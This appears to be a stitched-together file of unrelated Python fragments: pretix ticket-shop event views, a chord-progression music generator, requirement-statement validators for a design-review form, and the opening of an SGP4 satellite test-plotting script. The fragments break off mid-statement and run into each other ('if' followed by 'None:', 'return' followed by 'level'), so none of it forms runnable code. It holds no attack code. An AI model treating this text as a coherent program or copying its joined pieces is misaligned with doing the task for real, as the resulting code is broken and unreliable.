allow_addons and not base_qs_set and not filter_items and not filter_categories:
event.cache.set(quota_cache_key, quota_cache, 5)
items = [item for item in items
if (len(item.available_variations) > 0 or not item.has_variations) and not item._remove]
return items, display_add_to_cart
@method_decorator(allow_frame_if_namespaced, 'dispatch')
@method_decorator(iframe_entry_view_wrapper, 'dispatch')
class EventIndex(EventViewMixin, EventListMixin, CartMixin, TemplateView):
template_name = "pretixpresale/event/index.html"
def get(self, request, *args, **kwargs):
# redirect old month-year-URLs to new date-URLs
keys = ("month", "year")
if all(k in request.GET for k in keys):
get_params = {k: v for k, v in request.GET.items() if k not in keys}
get_params["date"] = "%s-%s" % (request.GET.get("year"), request.GET.get("month"))
return redirect(self.request.path + "?" + urlencode(get_params))
# redirect old week-year-URLs to new date-URLs
keys = ("week", "year")
if all(k in request.GET for k in keys):
get_params = {k: v for k, v in request.GET.items() if k not in keys}
get_params["date"] = "%s-W%s" % (request.GET.get("year"), request.GET.get("week"))
return redirect(self.request.path + "?" + urlencode(get_params))
from pretix.presale.views.cart import get_or_create_cart_id
self.subevent = None
if request.GET.get('src', '') == 'widget' and 'take_cart_id' in request.GET:
# User has clicked "Open in a new tab" link in widget
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.index', kwargs=kwargs))
elif request.GET.get('iframe', '') == '1' and 'take_cart_id' in request.GET:
# Widget just opened, a cart already exists. Let's do a redirect to check whether cookies are disabled
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.index', kwargs=kwargs) + '?require_cookie=true&cart_id={}'.format(
request.GET.get('take_cart_id')
))
elif request.GET.get('iframe', '') == '1' and len(self.request.GET.get('widget_data', '{}')) > 3:
# We've been passed data from a widget; we need to create a cart session to store it.
get_or_create_cart_id(request)
elif 'require_cookie' in request.GET and settings.SESSION_COOKIE_NAME not in request.COOKIES:
# Cookies are in fact not supported
r = render(request, 'pretixpresale/event/cookies.html', {
'url': eventreverse(
request.event, "presale:event.index", kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''}
) + (
"?src=widget&take_cart_id={}".format(request.GET.get('cart_id'))
if "cart_id" in request.GET else ""
)
})
r._csp_ignore = True
return r
if request.sales_channel.identifier not in request.event.sales_channels:
raise Http404(_('Tickets for this event cannot be purchased on this sales channel.'))
if request.event.has_subevents:
if 'subevent' in kwargs:
self.subevent = request.event.subevents.using(settings.DATABASE_REPLICA).filter(pk=kwargs['subevent'], active=True).first()
if not self.subevent:
raise Http404()
return super().get(request, *args, **kwargs)
else:
return super().get(request, *args, **kwargs)
else:
if 'subevent' in kwargs:
return redirect(self.get_index_url())
else:
return super().get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
# Show voucher option if an event is selected and vouchers exist
vouchers_exist = self.request.event.cache.get('vouchers_exist')
if vouchers_exist is None:
vouchers_exist = self.request.event.vouchers.exists()
self.request.event.cache.set('vouchers_exist', vouchers_exist)
context['show_vouchers'] = context['vouchers_exist'] = vouchers_exist
context['ev'] = self.subevent or self.request.event
context['subevent'] = self.subevent
context['allow_waitinglist'] = self.request.event.settings.waiting_list_enabled and context['ev'].presale_is_running
if not self.request.event.has_subevents or self.subevent:
# Fetch all items
items, display_add_to_cart = get_grouped_items(
self.request.event, self.subevent,
filter_items=self.request.GET.getlist('item'),
filter_categories=self.request.GET.getlist('category'),
require_seat=None,
channel=self.request.sales_channel.identifier,
memberships=(
self.request.customer.usable_memberships(
for_event=self.subevent or self.request.event,
testmode=self.request.event.testmode
) if getattr(self.request, 'customer', None) else None
),
)
context['waitinglist_seated'] = False
if context['allow_waitinglist']:
for i in items:
if not i.allow_waitinglist or not i.requires_seat:
continue
if i.has_variations:
for v in i.available_variations:
if v.cached_availability[0] != Quota.AVAILABILITY_OK:
context['waitinglist_seated'] = True
break
else:
if i.cached_availability[0] != Quota.AVAILABILITY_OK:
context['waitinglist_seated'] = True
break
items = [i for i in items if not i.requires_seat]
context['itemnum'] = len(items)
context['allfree'] = all(
item.display_price.gross == Decimal('0.00') for item in items if not item.has_variations
) and all(
all(
var.display_price.gross == Decimal('0.00')
for var in item.available_variations
)
for item in items if item.has_variations
)
# Regroup those by category
context['items_by_category'] = item_group_by_category(items)
context['display_add_to_cart'] = display_add_to_cart
context['cart'] = self.get_cart()
context['has_addon_choices'] = any(cp.has_addon_choices for cp in get_cart(self.request))
if self.subevent:
context['frontpage_text'] = str(self.subevent.frontpage_text)
else:
context['frontpage_text'] = str(self.request.event.settings.frontpage_text)
if self.request.event.has_subevents:
context['subevent_list'] = SimpleLazyObject(self._subevent_list_context)
context['subevent_list_cache_key'] = self._subevent_list_cachekey()
context['show_cart'] = (
context['cart']['positions'] and (
self.request.event.has_subevents or self.request.event.presale_is_running
)
)
if self.request.event.settings.redirect_to_checkout_directly:
context['cart_redirect'] = eventreverse(self.request.event, 'presale:event.checkout.start',
kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''})
if context['cart_redirect'].startswith('https:'):
context['cart_redirect'] = '/' + context['cart_redirect'].split('/', 3)[3]
else:
context['cart_redirect'] = self.request.path
return context
def _subevent_list_cachekey(self):
cache_key_parts = [
self.request.host,
str(self.request.event.pk),
self.request.get_full_path(),
self.request.LANGUAGE_CODE,
self.request.sales_channel.identifier,
]
cache_key = f'pretix.presale.views.event.EventIndex.subevent_list_context:{hashlib.md5(":".join(cache_key_parts).encode()).hexdigest()}'
return cache_key
def _subevent_list_context(self):
voucher = None
if self.request.GET.get('voucher'):
try:
voucher = Voucher.objects.get(code__iexact=self.request.GET.get('voucher'), event=self.request.event)
except Voucher.DoesNotExist:
pass
context = {}
context['list_type'] = self.request.GET.get("style", self.request.event.settings.event_list_type)
if context['list_type'] not in ("calendar", "week") and self.request.event.subevents.filter(date_from__gt=now()).count() > 50:
if self.request.event.settings.event_list_type not in ("calendar", "week"):
self.request.event.settings.event_list_type = "calendar"
context['list_type'] = "calendar"
if context['list_type'] == "calendar":
self._set_month_year()
tz = pytz.timezone(self.request.event.settings.timezone)
_, ndays = calendar.monthrange(self.year, self.month)
before = datetime(self.year, self.month, 1, 0, 0, 0, tzinfo=tz) - timedelta(days=1)
after = datetime(self.year, self.month, ndays, 0, 0, 0, tzinfo=tz) + timedelta(days=1)
context['date'] = date(self.year, self.month, 1)
context['before'] = before
context['after'] = after
ebd = defaultdict(list)
add_subevents_for_days(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request),
before, after, ebd, set(), self.request.event,
self.kwargs.get('cart_namespace'),
voucher,
)
# Hide names of subevents in event series where it is always the same. No need to show the name of the museum thousands of times
# in the calendar. We previously only looked at the current time range for this condition which caused weird side-effects, so we need
# an extra query to look at the entire series. For performance reasons, we have a limit on how many different names we look at.
context['show_names'] = sum(len(i) for i in ebd.values() if isinstance(i, list)) < 2 or self.request.event.cache.get_or_set(
'has_different_subevent_names',
lambda: len(set(str(n) for n in self.request.event.subevents.values_list('name', flat=True).annotate(c=Count('*'))[:250])) != 1,
timeout=120,
)
context['weeks'] = weeks_for_template(ebd, self.year, self.month)
context['months'] = [date(self.year, i + 1, 1) for i in range(12)]
context['years'] = range(now().year - 2, now().year + 3)
elif context['list_type'] == "week":
self._set_week_year()
tz = pytz.timezone(self.request.event.settings.timezone)
week = isoweek.Week(self.year, self.week)
before = datetime(
week.monday().year, week.monday().month, week.monday().day, 0, 0, 0, tzinfo=tz
) - timedelta(days=1)
after = datetime(
week.sunday().year, week.sunday().month, week.sunday().day, 0, 0, 0, tzinfo=tz
) + timedelta(days=1)
context['date'] = week.monday()
context['before'] = before
context['after'] = after
ebd = defaultdict(list)
add_subevents_for_days(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request),
before, after, ebd, set(), self.request.event,
self.kwargs.get('cart_namespace'),
voucher,
)
# Hide names of subevents in event series where it is always the same. No need to show the name of the museum thousands of times
# in the calendar. We previously only looked at the current time range for this condition which caused weird side-effects, so we need
# an extra query to look at the entire series. For performance reasons, we have a limit on how many different names we look at.
context['show_names'] = sum(len(i) for i in ebd.values() if isinstance(i, list)) < 2 or self.request.event.cache.get_or_set(
'has_different_subevent_names',
lambda: len(set(str(n) for n in self.request.event.subevents.values_list('name', flat=True).annotate(c=Count('*'))[:250])) != 1,
timeout=120,
)
context['days'] = days_for_template(ebd, week)
years = (self.year - 1, self.year, self.year + 1)
weeks = []
for year in years:
weeks += [
(date_fromisocalendar(year, i + 1, 1), date_fromisocalendar(year, i + 1, 7))
for i in range(53 if date(year, 12, 31).isocalendar()[1] == 53 else 52)
]
context['weeks'] = [[w for w in weeks if w[0].year == year] for year in years]
context['week_format'] = get_format('WEEK_FORMAT')
if context['week_format'] == 'WEEK_FORMAT':
context['week_format'] = WEEK_FORMAT
context['short_month_day_format'] = get_format('SHORT_MONTH_DAY_FORMAT')
if context['short_month_day_format'] == 'SHORT_MONTH_DAY_FORMAT':
context['short_month_day_format'] = SHORT_MONTH_DAY_FORMAT
else:
context['subevent_list'] = self.request.event.subevents_sorted(
filter_qs_by_attr(self.request.event.subevents_annotated(self.request.sales_channel.identifier).using(settings.DATABASE_REPLICA), self.request)
)
if self.request.event.settings.event_list_available_only and not voucher:
context['subevent_list'] = [
se for se in context['subevent_list']
if not se.presale_has_ended and (se.best_availability_state is None or se.best_availability_state >= Quota.AVAILABILITY_RESERVED)
]
return context
@method_decorator(allow_frame_if_namespaced, 'dispatch')
@method_decorator(iframe_entry_view_wrapper, 'dispatch')
class SeatingPlanView(EventViewMixin, TemplateView):
template_name = "pretixpresale/event/seatingplan.html"
def get(self, request, *args, **kwargs):
from pretix.presale.views.cart import get_or_create_cart_id
self.subevent = None
if request.GET.get('src', '') == 'widget' and 'take_cart_id' in request.GET:
# User has clicked "Open in a new tab" link in widget
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.seatingplan', kwargs=kwargs))
elif request.GET.get('iframe', '') == '1' and 'take_cart_id' in request.GET:
# Widget just opened, a cart already exists. Let's do a redirect to check whether cookies are disabled
get_or_create_cart_id(request)
return redirect(eventreverse(request.event, 'presale:event.seatingplan', kwargs=kwargs) + '?require_cookie=true&cart_id={}'.format(
request.GET.get('take_cart_id')
))
elif request.GET.get('iframe', '') == '1' and len(self.request.GET.get('widget_data', '{}')) > 3:
# We've been passed data from a widget; we need to create a cart session to store it.
get_or_create_cart_id(request)
if request.event.has_subevents:
if 'subevent' in kwargs:
self.subevent = request.event.subevents.using(settings.DATABASE_REPLICA).filter(pk=kwargs['subevent'], active=True).first()
if not self.subevent or not self.subevent.seating_plan:
raise Http404()
return super().get(request, *args, **kwargs)
else:
raise Http404()
else:
if 'subevent' in kwargs or not request.event.seating_plan:
raise Http404()
else:
return super().get(request, *args, **kwargs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['subevent'] = self.subevent
context['cart_redirect'] = eventreverse(self.request.event, 'presale:event.checkout.start',
kwargs={'cart_namespace': kwargs.get('cart_namespace') or ''})
if context['cart_redirect'].startswith('https:'):
context['cart_redirect'] = '/' + context['cart_redirect'].split('/', 3)[3]
return context
class EventIcalDownload(EventViewMixin, View):
def get(self, request, *args, **kwargs):
if
None:
arg2chords = ()
for i in arg1chords:
if (i._size==arg2) or (i._happ==arg2):
arg2chords = arg2chords + (i,)
return arg2chords
def makeProg(self, progsize, arg1dist, arg2dist): # Return chord progression of size with selected distributions
def aux(scale, a1d, a2d):
arg1 = wselect(a1d)
arg2 = wselect(a2d)
chords = scale.getChords(arg1, arg2)
if len(chords) == 0:
return aux(scale, a1d, a2d)
return rselect(chords)
prog = ()
for i in range(progsize):
ch = aux(self,arg1dist, arg2dist)
print(ch)
if ch in prog:
print(ch, "retrying")
ch = aux(self,arg1dist, arg2dist) #if chord is already in prog, it is rerolled to lower odds of repeated chords
print("retried and got", ch)
prog = prog + (ch,)
return prog
def sample(self, inst = filezart.getInstrument("Piano_original")):
total = (500 * 7) + 3000
notes = listNotes(inst)
mednote = notes[len(notes)//2]
medoct = mednote._octave
audio = AudioSegment.silent(total)
t = 0
for note in self._notes:
newn = mnote(note._type + (medoct*12))
noteaudio = newn.getAudio(inst, 60)
audio = audio.overlay(noteaudio, t)
t= t+500
return audio
# chord3 Classic 3 note Chord Class
# must be initialized with three notes or via fromRandom()
class chord3:
def __init__(self, note1, note2, note3):
lista = (mnote(note1._type), mnote(note2._type), mnote(note3._type))
self._types = self.chordSort(lista)
self._size = "" # "short", "normal", "large"
self._happ = "" # "minor", "weird", "major"
self.classify()
def __repr__(self):
string = "<."
for i in self._types:
string = string + i._typename + "."
return string + ">"
def __eq__(self, other):
if(isinstance(other, chord3)):
return (self._types[0]._value == other._types[0]._value)
return False
def __hash__(self):
return self._types[0]._value * self._types[1]._value * self._types[2]._value
@classmethod
def fromRandom(cls): # can create as chord3.fromRandom()
notes = firstOctave()
note1 = rselect(notes)
notes = removeEls(notes, note1, lambda x,y: x.isDissonant(y))
notes = removeEls(notes, note1, lambda x,y: x.isSame(y))
note2 = rselect(notes)
notes = removeEls(notes, note2, lambda x,y: x.isDissonant(y))
notes = removeEls(notes, note2, lambda x,y: x.isSame(y))
note3 = rselect(notes)
return cls(note1, note2, note3)
@classmethod
def fromScale(cls, scale):
return rselect(scale.getChords())
def chordSort(self, notes): # puts notes in order of chord
a = notes[0]
b = notes[1]
c = notes[2]
distAB = a.distance(b)
distBC = b.distance(c)
distAC = a.distance(c)
if (distAB>=distBC) and (distAB>=distAC):
far1 = a
far2 = b
mid = c
elif (distBC>=distAB) and (distBC>=distAC):
far1 = b
far2 = c
mid = a
else:
far1 = a
far2 = c
mid = b
if far1.premier(mid):
first = far1
second = mid
third = far2
else:
first = far2
second = mid
third = far1
return (first, second, third)
def classify(self): # calculates _size and _happ attributes
a = self._types[0]
b = self._types[1]
c = self._types[2]
leap1 = a.distance(b)
leap2 = b.distance(c)
size = leap1 + leap2
if size > 7:
self._size = "large"
elif size < 7:
self._size = "short"
else:
self._size = "normal"
if leap1 > leap2:
self._happ = "major"
elif leap1 < leap2:
self._happ = "minor"
else:
self._happ = "weird"
return
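# Worked example (illustrative, assuming distance() returns semitone distances):
# a root-position major triad spans leaps of 4 + 3 semitones, so size == 7 -> "normal"
# and leap1 > leap2 -> "major"; 3 + 4 gives "minor"; equal leaps (e.g. an augmented
# triad's 4 + 4) give "weird", and a total above 7 would make the chord "large".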
def sampleAudio(self, inst = filezart.getInstrument("Piano_original")):
notes = listNotes(inst)
mednote = notes[len(notes)//2]
medoct = mednote._octave
notes = (mnote(self._types[0]._type + 12*medoct),mnote(self._types[1]._type + 12*medoct),mnote(self._types[2]._type + 12*medoct))
audio = AudioSegment.silent(3000)
for note in notes:
noteaudio = note.getAudio(inst, 60)
audio = audio.overlay(noteaudio, position=0)
return audio
# Small section of sheet music class
# Initialized with number of beats and chord3(optional)
class chunk:
def __init__(self, size, chord=None):
self._size = size
self._chord = chord
self._content = [()]*(4*size) # Notes can be placed on half and quarter beats
def __repr__(self):
st = "|"
c = 4
for i in self._content:
if (c==4):
c=0
st = st + "|"
c = c+1
st = st + "."
for j in i:
st = st + str(j) + "."
st = st + "|"
return st
def indexof(self, tempo): # List index corresponding to tempo ex: 0.75 -> 3
return int(tempo*4)
def set(self, tempo, tupl):
i = self.indexof(tempo)
self._content[i] = tupl
def get(self, tempo):
i = self.indexof(tempo)
return self._content[i]
def add(self, tempo, note):
i = self.indexof(tempo)
self._content[i] = self._content[i] + (note,)
def wholes(self): # List of whole tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i,)
return lista
def halves(self): # List of half tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i+0.5,)
return lista
def quarters(self): # List of quarter tempos in chunk
lista = ()
for i in range(self._size):
lista = lista + (i+0.25, i+0.75)
return lista
def randMovs(self, count, tweights, mweights): # Places count mmov objects with mweights and tweights distribution on chunk
for i in range(count):
mov = wselect(mweights)
ttype = wselect(tweights) # tweights should be dict of ("whole", "half", "quarter") (note that there are twice as many quarters)
if ttype == "whole":
tempo = rselect(self.wholes())
elif ttype == "half":
tempo = rselect(self.halves())
elif ttype == "quarter":
tempo = rselect(self.quarters())
else:
raise ValueError ("Invalid ttype: " + ttype + ".")
self.add(tempo, mov)
return
def applyToMovs(self, voic): # Replaces mmovs with mnotes according to voice
last = None
for temp in range(len(self._content)):
newtemp = ()
lastcandidate = None
for mov in self._content[temp]:
if(isinstance(mov, mmov)):
sel = mov.select(last,voic._weights, self._chord)
newtemp = newtemp + (sel,)
lastcandidate = sel
elif(isinstance(mov, mnote)):
newtemp = newtemp + (mov,) #mov is actually a note here
lastcandidate = mov
if lastcandidate != None:
last = lastcandidate
self._content[temp] = newtemp
return
def baseDuration(self, bpm): # Duration of chunk without extra time for last note to play
beat = bpmToBeat(bpm)
base = beat*self._size
return base
def getAudio(self, inst, bpm): # returns AudioSegment
beat = bpmToBeat(bpm)
base = beat*self._size
total = base + 3000 #extra time for last note to play
sound = AudioSegment.silent(total)
for temp in range(len(self._content)):
thissound = AudioSegment.silent(3000)
for note in self._content[temp]:
noteaudio = note.getAudio(inst, bpm)
thissound = thissound.overlay(noteaudio, position=0)
sound = sound.overlay(thissound, position=(beat/4)*temp)
return sound
def clearAudio(self): # recursive clean of audio cache
return
def toTab(self): # return Tab string
return str(self)
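# Illustrative usage of chunk (a sketch, not part of the original file): each beat owns
# four slots, so indexof() maps a tempo such as 1.25 to list index 5. The strings below
# merely stand in for mnote/mmov objects, which chunk only stores and prints.
def _chunk_demo():
    c = chunk(2)        # two beats -> 8 slots
    c.add(0, "C")       # first whole beat        -> index 0
    c.add(0.5, "E")     # half of the first beat  -> index 2
    c.add(1.25, "G")    # quarter of second beat  -> index 5
    return c.indexof(1.25), str(c)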
# Chord progression class, list of size chunks
# Initialized with size of chunks
class progression:
def __init__(self, csize):
self._csize = csize
self._chunks = ()
self._audio = None
self._abpm = 0
self._ainst = None
def baseDuration(self, bpm): # Duration of chunk without extra time for last note to play
beat = bpmToBeat(bpm)
base = beat*self._csize*len(self._chunks)
return base
def getAudio(self, inst, bpm): # check if audio is cached
if (self._audio is None) or (self._abpm != bpm) or (self._ainst != inst):
print("caching")
return self.forceGetAudio(inst, bpm)
print("cached")
return self._audio
def clearAudio(self): # recursive clean of audio cache
self._audio = None
for c in self._chunks:
c.clearAudio()
def forceGetAudio(self, inst, bpm): # returns AudioSegment
beat = bpmToBeat(bpm)
base = beat*self._csize*len(self._chunks)
total = base + 3000 #extra time for last note to play
sample = self._chunks[0]
chunkdur = sample.baseDuration(bpm)
sound = AudioSegment.silent(total)
for ctime in range(len(self._chunks)):
caudio = self._chunks[ctime].getAudio(inst, bpm)
sound = sound.overlay(caudio, position=ctime*chunkdur)
self._audio = sound
self._abpm = bpm
self._ainst = inst
return sound
def toTab(self): # return Tab string
stri = ""
for ch in self._chunks:
stri = stri + "\n" + ch.toTab()
return stri
# Voice Class, identifies instrument, octave zone, stereo and volume information
# Has list of progressions
# Initialized with instrument, centre, scale, mtype(optional), volume(optional), pan(optional)
class voice:
def __init__(self, instrument, centre, scale, mtype = "chordic", vol = 0, pan = 0): #vol in db added to output, pan in [-1, 1]
self._inst = instrument
self._cent = centre
self._vol = vol
self._pan = pan
self._mtype = mtype # mtype: "generic" "chordic" "smelodic" "lmelodic" "percussion"
self._scale = scale
self._weights = {}
self._progs = ()
self._audio = None
self._abpm = 0
notes = listNotes(instrument)
notes = removeEls(notes, scale, lambda x,y : ( not(x.inScale(y))))
for note in notes:
self._weights[note] = adaptedNormal(centre._value, note._value)
def __repr__(self):
return "~" + self.getTag() + ":" + self._inst._name + "->" + str(self._cent) + "<-" + str(self._scale)[2:-2] + "~"
def getTag(self):
try:
return
level
# check if cascade level is one of the approved options.
# returns true if it is procedure step, user need, risk need, business need, design input or design output
# FDR rules: cascade level may only be one of the 6 defined types.
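# Note on the chained ^ (XOR) below: XOR over booleans yields True whenever an odd
# number of the checks are True, so it only means "exactly one" if the six category
# checks are mutually exclusive. For example:
#   True ^ False ^ False -> True   (one match)
#   True ^ True  ^ False -> False  (two matches)
#   True ^ True  ^ True  -> True   (three matches: odd, but not "exactly one")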
def is_cascade_lvl_approved(value):
if is_procedure_step(value) \
^ is_user_need(value) \
^ is_risk_need(value) \
^ is_business_need(value) \
^ is_design_input(value) \
^ is_design_output(value) is True:
return True
else:
return False
# V&V Results
# check if W/C, wc or windchill is present; should indicate that a windchill number is present
# FDR rules: Design inputs and outputs may reference a document in windchill for its verification/validation results
def has_w_slash_c(value):
# convert input argument to all lower case for comparison
val_lower = value.lower()
if val_lower.find("w/c") != -1:
return True
elif val_lower.find("wc") != -1:
return True
elif val_lower.find("windchill") != -1:
return True
else:
return False
# V&V
# check if 10 digit windchill number is present. example W/C# 0000006634
def is_windchill_number_present(value):
# remove all spaces
value = value.replace(" ", "")
# find index of 000. windchill numbers have at least three leading zeros.
leading_zeros_index = value.find("000")
# slice the string starting at that index until the end of the string
value = value[leading_zeros_index:]
# slice string again into two parts. first 10 characters (possible WC number) and remaining characters
wc_number = value[:10]
remaining_char = value[10:]
# test if wc_number is all digits and remaining is all letters
if wc_number.isdigit() and (remaining_char.isalpha() or len(remaining_char) == 0) is True:
return True
else:
return False
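# Quick illustrative checks for the two helpers above (made-up strings):
# has_w_slash_c("See W/C# 0000006634 for results")  -> True
# is_windchill_number_present("W/C# 0000006634")    -> True   (ten digits after the leading zeros)
# is_windchill_number_present("no number here")     -> False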
# Design Output Feature
# check for CTQ IDs. returns true if "CTQ" is present in the cell
# FDR rules: CTQ (critical to quality) features should be called out in the Design Output features column.
# CTQs should be called out using the following format: (CTQ08)
def has_ctq_id(value):
if value.lower().find("ctq") != -1:
return True
else:
return False
# Design Output Features
# check for CTQ number after CTQ tag. returns true if all occurrences of CTQ are followed by two digits
# returns false if no CTQs are present OR they are not followed by two digits. (this should be used in conjunction
# with the previous function that looks for CTQ in the cell to eliminate possibility of the former case)
# FDR rules: CTQ (critical to quality) features should be called out in the Design Output features column.
# CTQs should be called out using the following format: (CTQ08)
def has_ctq_numbers(value):
ctq_count = 0
number_count = 0
# find index of first CTQ ID
ctq_index = value.lower().find("ctq")
# while loop will keep searching for CTQ IDs until there are none. the string is sliced, checked for digits,
# searched for a new ID, index found for new CTQ ID, repeat.
while ctq_index != -1:
# add 1 to ctq_counter, if there were no CTQs, the while condition would not be met.
ctq_count += 1
# slice value from after "ctq"
value = value[ctq_index + 3:]
# if the next two characters are numbers (they should be if formatted correctly)
if value[0:2].isdigit() is True:
# add 1 to number counter. this counter will be compared to ctq_count later. they should match
number_count += 1
# search for next CTQ. if there are none, find() will return -1 and the while loop will end
ctq_index = value.lower().find("ctq")
# if "ctq" and number count match AND they aren't zero...they are formatted correctly.
if (ctq_count == number_count) and ctq_count > 0:
return True
else:
return False
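# Illustrative inputs (made up) for the two CTQ helpers:
# has_ctq_id("Slot depth (CTQ08)")             -> True
# has_ctq_numbers("(CTQ08) and (CTQ12)")       -> True   (every CTQ is followed by two digits)
# has_ctq_numbers("(CTQ) missing its number")  -> False  (ctq_count != number_count)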
# Requirement Statement
# checks for hash (#) symbol in string
# FDR rules: hashtags are used to identify parent/child relationships,
# functional requirements, mating part requirements, user interface requirements and mechanical properties
def has_hash(value):
if value.find("#") != -1:
return True
else:
return False
# Requirement Statement
# checks for #Function in cell.
# FDR rules: The requirement statement can be tagged using #Function to identify a functional requirement
def has_hash_function(value):
if value.find("#Function") != -1:
return True
else:
return False
# Requirement Statement
# checks for #MatingParts
# FDR rules: The requirement statement can be tagged using #MatingParts to identify a requirement pertaining to proper
# fitting between components
def has_hash_mating_parts(value):
if value.find("#MatingParts") != -1:
return True
else:
return False
# Requirement Statement
# checks for #MechProperties
# FDR rules: The requirement statement can be tagged using #MechProperties to identify a requirement that pertains to
# the mechanical properties of the implant/instrument
def has_hash_mech_properties(value):
if value.find("#MechProperties") != -1:
return True
else:
return False
# Requirement Statement
# checks for #UserInterface
# FDR rules: the requirement statement can be tagged using #UserInterface to identify a requirement that relates to how
# the user handles the implant/instrument
def has_hash_user_interface(value):
if value.find("#UserInterface") != -1:
return True
else:
return False
# TODO will #Parent or #AdditionalParent be used in requirement statement? sticking with #Parent for now
# Requirement Statement
# checks for #Child returns true if #Child is present
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def has_hash_child(value):
if value.find("#Child") != -1:
return True
else:
return False
# Requirement Statement
# checks for #Parent returns true if #Parent is present
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
# TODO let's not use the word "hash" here. It has a very specific meaning in computer science which can cause
# confusion. In fact, you've probably already heard/seen it mentioned in the git literature. It's synonymous with
# "checksum". It's how Python dictionaries work too.
def has_hash_parent(value):
if value.find("#Parent") != -1:
return True
else:
return False
# Requirement Statement
# returns IDs (P###-###) that are tagged using #Child as a list. assumes there are #Child present.
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def child_ids(value):
# init output list. will append with values later
ids_output_list = []
# remove spaces for easier evaluation
value = value.replace(" ", "")
# while there are #Child tags in the string. string will be sliced after each ID is retrieved
while value.find("#Child") != -1:
# find the index of the child hashtag
hash_index = value.find("#Child")
value = value[hash_index:]
# find the beginning of the ID by searching for P
id_start_index = value.find("P")
# append output list with ID
ids_output_list.append(value[id_start_index:id_start_index + 8])  # P###-### is 8 characters
value = value[id_start_index:]
return ids_output_list
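# Example (made-up string), using the 8-character ID slice above:
# child_ids("#Child = P123-456, #Child = P789-012") -> ['P123-456', 'P789-012']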
# Requirement Statement
# returns IDs (P###-###) that are tagged using #Parent as a list. assumes there are #Parent present.
# FDR rules: #Child and #Parent are used to link a Design Input that leads to a Design Output Solution that has
# been documented earlier in the form. The Design Input is tagged using #Child = P###-### where the ID refers to the
# Output solution and the Output solution is tagged using #Parent = P###-### where the ID refers to the Design Input
def parent_ids(value):
# init output list. will append with values later
ids_output_list = []
# remove spaces for easier evaluation
value = value.replace(" ", "")
# while there are #Parent tags in the string. string will be sliced after each ID is retrieved
while value.find("#Parent") != -1:
# find the index of the parent hashtag
hash_index = value.find("#Parent")
# slice value from the hash_index + 2 (to account for capital P at the beginning of Parent) to the end
value
#!/bin/env python
# Plot differences between sets of TEME vectors
import matplotlib.pyplot as plt
import matplotlib.patheffects as pe
import re
import os, sys
import subprocess
import datetime
import csv
from math import degrees, isnan
# Configuration ###############################################################
dry_run = False
elev_only = False
if (len(sys.argv) > 1):
if (sys.argv[1] == 'd'):
dry_run = True
elif (sys.argv[1] == 'e'):
elev_only = True
aiaa_binary = 'aiaa'
ansi_binary = 'ansi'
if os.name == 'nt':
print("Assuming Windows environment")
aiaa_binary += '.exe'
ansi_binary += '.exe'
if os.name == 'posix':
print("Assuming Linux (posix) environment")
ver_filename = 'SGP4-VER.TLE'
fullcat_filename = 'full.tle'
aiaa_out_filename = 'i72.out'
ansi_out_filename = 'ansi.out'
sat_re = re.compile(r'([0-9]{1,5})\ \(([0-9. e+]+)\)')
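# Example of what sat_re captures (satellite number plus the parenthesised timing value);
# the sample line is made up but follows the expected output format:
#   sat_re.findall('23599 (1.234e+00)') -> [('23599', '1.234e+00')]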
tdiff_it = datetime.timedelta()
tdiff_ansit = datetime.timedelta()
tdiff_ic = datetime.timedelta()
tdiff_ansic = datetime.timedelta()
# Test runs ###################################################################
def elev():
print('Running libsgp4ansi in elevations generation mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'p'],
stdout=subprocess.PIPE).communicate()[0].decode())
el_x = []
el_y = []
# el_a = []
with open('elevations.out') as f:
elevations_data = f.readlines()
for line in elevations_data:
el_x.append(int(line.split(',')[0]))
el_y.append(float(line.split(',')[1]))
# el_a.append(float(line.split(',')[2]))
fig, ax = plt.subplots(1, 1)
fig.canvas.set_window_title('Elevation')
xmin = 0
xmax = el_x[len(el_x) - 1]
xticksmin = range(xmin, xmax + 1, 1440 * 60)
xticksmaj = range(xmin, xmax + 1, 360 * 60)
yticksmin = [-75, -60, -45, -30, -15, 15, 30, 45, 60, 75]
yticksmaj = [0]
ax.plot(el_x, el_y, c='b', marker='', ls='-', lw=0.5)
# ax.plot(el_x, el_a, c='r', marker='', ls='-', lw=0.5)
ax.set_xlim(xmin, xmax)
ax.set_ylim(-90, 90)
ax.set_xticks(xticksmin, True);
ax.set_xticks(xticksmaj, False);
ax.grid(which='major', axis='x', ls='dashed', alpha=0.7)
ax.grid(which='minor', axis='x', ls='dotted', alpha=0.3)
ax.set_yticks(yticksmin, True);
ax.set_yticks(yticksmaj, False);
ax.grid(which='major', axis='y', ls='-', alpha=1)
ax.grid(which='minor', axis='y', ls='dotted', alpha=0.5)
ax.set_title('Elevation of test satellite-observer pair')
ax.set_xlabel('Time, min')
ax.set_ylabel('Elevation, deg')
fig.set_tight_layout({'pad':0.0, 'w_pad':0.1, 'h_pad':0.1})
plt.show()
exit(0)
def verif():
print('Running AIAA-2006-6753 verification mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), aiaa_binary), 'i', 'v', ver_filename],
stdout=subprocess.PIPE).communicate()[0].decode())
print('Running libsgp4ansi verification mode...')
print(subprocess.Popen([os.path.join(os.getcwd(), ansi_binary), 'v', ver_filename],
